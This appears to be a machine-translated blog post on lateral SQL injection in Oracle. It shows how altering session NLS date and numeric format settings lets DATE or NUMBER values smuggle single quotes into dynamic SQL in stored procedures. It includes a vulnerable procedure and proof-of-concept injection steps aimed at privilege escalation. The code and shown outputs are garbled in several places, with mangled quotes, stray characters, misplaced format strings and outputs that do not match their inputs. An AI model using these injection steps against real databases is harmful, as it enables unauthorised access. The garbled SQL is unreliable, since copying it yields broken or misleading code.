Personal opinion

  • 2020-06-07 05:28:51
  • OfStack

Don't worry too much if you execute the SQL statement or parameter binding directly,
Such as the ORACLE stored procedure below
create or replace procedure kjdatepoc(date d)

as

begin

insert into kjdatetable values(d);

commit;

end;

There is no need to worry about the new SQL injection attack, so where can DATE and NUMBER injection attacks happen? ? Generally, dynamic SQL is used without parameter binding.

For example, DBMS_SQL or EXECUTE IMMEDIATE are commonly used by engineers

Look at the following stored procedure

create or replace procedure kjdatepoc(date d)

as

begin

execute immediate 'insert into kjdatetable values('|| d ||')';

commit;

end;

If the above stored procedure or function is encountered, the value of NLS_DATE_FORMAT in SESSION can also be modified to achieve the purpose of SQL injection.

The expat PAPER is very detailed, and I won't make any nonsense of it here.

Except for the NUMBER injection, I didn't explain it much. I just showed you that you can print single quotes!

Look at the following statement

ALTER SESSION SET NLS_NUMERIC_CHARACTERS = "';

999999 D99999 SELECT to_number (1000.10001, ' ') | | "FROM DUAL;

Output 1 result

1000 '10001

It's just one more single quote, so what's the point? On the bright side! It's valuable in certain situations! Look at the following stored procedure

create or replace procedure NumInjPoc(kjexpnum number,kjexpstr varchar2)

is

SecStr varchar2(1000);

begin

SecStr: = replace (kjexpstr, ""," "");

sys.dbms_output.put_line('SELECT * FROM DUAL ID='||kjexpnum||' and name= '||SecStr|| ");

end;

Internally replaced varchar type! We can test it

begin

numinjpoc (1000, '� ");

end;

Its output SQL statement is

SELECT * FROM WHERE ID=1000 and name= ""

The single quote has been escaped

So how do we do it in combination with this NUMBER type?

ALTER SESSION SET NLS_NUMERIC_CHARACTERS = "';

begin

999999 D99999 numinjpoc (TO_NUMBER (0.10001, ' '), '| | kj. exp () �');

end;

Look at the output

SELECT * DUAL WHERE ID='10001 and name='||kj ()...

So you can attack it indirectly...

After the cooperation of ALTER SESSION is required to a certain degree, it is necessary to attack 1 function or procedure inside the system to enhance the authority. It is not a good idea to break through, but for single statement SQL injection attack, with the result as the guide! This approach doesn't do much.